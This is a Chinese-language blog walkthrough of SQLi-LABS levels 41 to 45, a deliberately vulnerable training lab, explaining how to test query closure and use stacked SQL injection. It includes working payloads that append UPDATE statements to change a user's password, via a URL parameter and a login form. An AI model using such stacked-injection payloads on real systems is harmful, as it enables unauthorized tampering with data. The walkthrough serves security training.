SQLi-LABS通关攻略【41-45】

Zhong-Xin2024-08-28 22:32

SQLi-LABS 41关

这一关是堆叠注入

测试闭合

?id=1' //回显错误

?id=1'--+ //回显错误

?id=1--+ //回显正确

所以是数字型的注入

测试堆叠注入,更改Dumb的密码

复制代码 
?id=1;update users set password='123456' where username='Dumb'--+

SQLi-LABS 42关

这一关使用的是post传参,所以需要进行抓包,依旧是堆叠注入

在密码处进行堆叠注入,更新Dumb的密码为123

返回登录测试是否更改成功

SQLi-LABS 43关

这一关和上一关一样,都是密码处是堆叠注入,只不过闭合方式是单引号加括号

复制代码 
1'); update users set password='666' where username='Dumb' --+

SQLi-LABS 44关

这一关和四十二关一样

SQLi-LABS 45关

这一关和四十三关一样,都不在赘述

相关推荐
欧先生^_^4 小时前
Linux内核可配置的参数
linux·服务器·数据库
问道飞鱼4 小时前
【数据库知识】Mysql进阶-高可用MHA(Master High Availability)方案
数据库·mysql·adb·高可用·mha
tiging4 小时前
centos7.x下,使用宝塔进行主从复制的原理和实践
数据库·mysql·adb·主从复制
wangcheng86995 小时前
Oracle常用函数-日期时间类型
数据库·sql·oracle
zizisuo5 小时前
面试篇:Spring Security
网络·数据库·安全
一只fish5 小时前
MySQL 8.0 OCP 1Z0-908 题目解析(2)
数据库·mysql
StarRocks_labs5 小时前
从InfluxDB到StarRocks:Grab实现Spark监控平台10倍性能提升
大数据·数据库·starrocks·分布式·spark·iris·物化视图
搞不懂语言的程序员5 小时前
Redis的Pipeline和Lua脚本适用场景是什么?使用时需要注意什么?
数据库·redis·lua
王RuaRua5 小时前
[数据结构]5. 栈-Stack
linux·数据结构·数据库·链表
Lw老王要学习7 小时前
Linux数据库篇、第一章_02_MySQL的使用增删改查
linux·运维·数据库·mysql·云计算·it
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05Coze扣子平台完整体验和实践(附国内和国际版对比)06DeepSeek各版本说明与优缺点分析07组基轨迹建模 GBTM的介绍与实现(Stata 或 R)08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09苍穹外卖面试总结10【解决】Android Gradle Sync 报错 Could not read workspace metadata